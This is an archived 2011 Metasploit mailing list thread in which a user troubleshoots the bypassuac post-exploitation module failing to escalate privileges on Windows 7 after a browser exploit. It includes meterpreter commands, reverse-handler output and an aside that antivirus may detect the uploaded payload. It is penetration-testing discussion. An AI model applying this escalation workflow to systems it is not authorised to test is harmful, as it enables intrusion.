Metasploit mailing list archives
Re: BypassUAC not working against Windows 7 x86
From: firstname lastname <psykosonik_frequenz () yahoo com>
Date: Sun, 4 Dec 2011 02:57:52 -0800 (PST)
Ok, I have not tried that already. Yes, I have a reverse_tcp meterpreter shell. I am able to run a set of commands like getuid, sysinfo and stuff. However, commands like sniffer_start and upload do not work for me. So, here's what I did to manually upload the bypassuac-x86.exe to the Windows 7 Target Machine. meterpreter > upload data/post/bypassuac-x86.exe C:\\Users\\Neon\\Desktop [*] uploading : data/post/bypassuac-x86.exe -> C:\Users\Neon\Desktop [-] core_channel_open: Operation failed: Access is denied. What's wrong with this? I have given the sysinfo and getuid output in my previous post already. Please let me know if you need more details to be able to troubleshoot this. Regards, NeonFlash ________________________________ From: Drforbin <drforbin6 () gmail com> To: firstname lastname <psykosonik_frequenz () yahoo com>; framework () spool metasploit com Sent: Sunday, December 4, 2011 1:50 PM Subject: Re: [framework] BypassUAC not working against Windows 7 x86 sorry about missing last part... Have you tried manually uploading to make sure uploading works? The firewall stuff is not important because have a meterpreter session. Your using reverse_tcp I assume? it should try and upload bypassuac-x64.exe or bypassuac-x86.exe and a meterpreter exe. the file names will be randomized.. drforbin On 12/04/2011 03:09 AM, firstname lastname wrote: I guess, you missed out my note at the end of my post which says that there is not sort of AV running on the target machine.
I even captured the network traffic while the exploit was run and the bypassuac script was executed. There was no executable present in the PCAP file either. There were files only specific to the Browser Exploit. Regards, NeonFlash ________________________________ From: Drforbin <drforbin6 () gmail com> To: firstname lastname <psykosonik_frequenz () yahoo com> Cc: framework () spool metasploit com Sent: Sunday, December 4, 2011 10:21 AM Subject: Re: [framework] BypassUAC not working against Windows 7 x86 I think what is happening is the AV is finding the meterpreter shellcode executable which bypassuac uploads to the system...I had this same issue and tracked it down to this. Metasploit executables even when encoded can be found
pretty easy by some AV software.
drforbin. I hope this helps...let me know. On 12/03/2011 11:00 PM, firstname lastname wrote: I am trying to gain Local System Privileges on a Windows 7 x86 target system. I have a meterpreter reverse tcp shell on the victim's machine after a successful browser exploit on MSIE version 8.0 running on the target machine.sysinfo output: Computer : Neon-PC OS : Windows 7 (Build 7601, Service
Pack 1).
Architecture : x86 System Language : en_US Meterpreter : x86/win32 getuid output: Server username: Neon-PC\Neon Next I run the bypass uac script as follows: use post/windows/escalate/bypassuac Output: [*] Started reverse handler on 192.168.2.6:4444 [*] Starting the payload handler... [*] Uploading the bypass UAC executable to the
filesystem...
[*] Meterpreter stager executable 73802 bytes long
being uploaded..
[*] Uploaded the agent to the filesystem.... Next, when I type in getsystem, I still get the error as: priv_elevate_getsystem: Operation failed: Access is denied. I have gone through the ruby script, bypassuac.rb and looks like it's executing properly till the end. As a last step, after uploading the UAC bypass agent to target machine, it has to execute it. But, looks like that is not happening. I even checked the %temp% directory on the target Windows Machine for the presence of any exe and did not find one. Any help here would be appreciated. PS: I have disabled Windows 7 Firewall as well, just in case that would be blocking any transfer of file. Also, there's no third party antivirus installed on the target machine. Regards, NeonFlash _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- BypassUAC not working against Windows 7 x86 firstname lastname (Dec 03)
- Re: BypassUAC not working against Windows 7 x86 Drforbin (Dec 03)
- Re: BypassUAC not working against Windows 7 x86 firstname lastname (Dec 04)
- Re: BypassUAC not working against Windows 7 x86 Drforbin (Dec 04)
- Re: BypassUAC not working against Windows 7 x86 firstname lastname (Dec 04)
- Message not available
- Re: BypassUAC not working against Windows 7 x86 firstname lastname (Dec 04)
- Re: BypassUAC not working against Windows 7 x86 Matthew Presson (Dec 04)
- Re: BypassUAC not working against Windows 7 x86 Drforbin (Dec 04)
- Re: BypassUAC not working against Windows 7 x86 firstname lastname (Dec 04)
- Re: BypassUAC not working against Windows 7 x86 firstname lastname (Dec 04)
- Re: BypassUAC not working against Windows 7 x86 Drforbin (Dec 03)